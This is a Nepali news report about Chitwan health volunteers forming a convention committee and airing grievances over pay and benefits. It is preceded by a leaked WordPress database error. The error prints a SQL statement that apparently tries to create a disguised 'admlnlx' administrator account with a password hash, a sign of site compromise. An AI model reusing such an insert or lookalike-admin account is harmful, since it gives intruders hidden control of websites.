WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkrJfNBKEEvjnZANMRXcUalXbFjge.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 05:07:52', '', 'admlnlx', 'admlnlx')
चितवन, माघ ७–
नेपाल स्वास्थ्य स्वयंसेविका संघ चितवनको शुक्रबार भरतपुरमा भएको भेलाले अधिवेशन आयोजक समिति गठन गरेको छ । भेलाले आगामी तीन महिनाभित्र अधिवेशन गर्ने गरी सीता जोशीको अध्यक्षतामा आयोजक समिति गठन गरेको हो ।
समितिको उपाध्यक्षमा नानीमैया तिमिल्सिना, सचिवमा सीता भट्ट, कोषाध्यक्षमा कमला पौडेल चयन भएका छन् । त्यसैगरी सदस्यहरुमा शोभा शर्मा, मिना अधिकारी, सीमा गौली, जेनी चौधरी, गोकर्ण चौधरी र लक्ष्मी भट्ट रहेका छन् ।
भेलालाई जिफन्ट प्रदेश संगठन कमिटी नं. ३ का संयोजक जनक चौधरी, सचिव रामहरि नेपाल, एमाले जिल्ला अध्यक्ष कृष्णभक्त पोखरेल, जिफन्ट प्रदेश संगठन कमिटी नं. ३ का सदस्यहरु कृष्ण रिमाल, सुमन पराजुली लगायतले सम्बोधन गरेका थिए । संघका जिल्ला अध्यक्ष गोविन्द अर्यालको सभापतित्वमा सम्पन्न भेलामा स्वयंसेविकाहरुले आफूहरुलाई सामाजिक दृष्टिले गलत धारणाले हेरिएको, कामको पारिश्रमिक नपाएको, अवकाशपछि उचित उपदानको व्यवस्था नभएको, सेवा सुविधा र साधनश्रोतको अभाव भएको र निजामती सेवा ऐन अनुसारको सुविधा नपाएको गुनासो गरेका थिए ।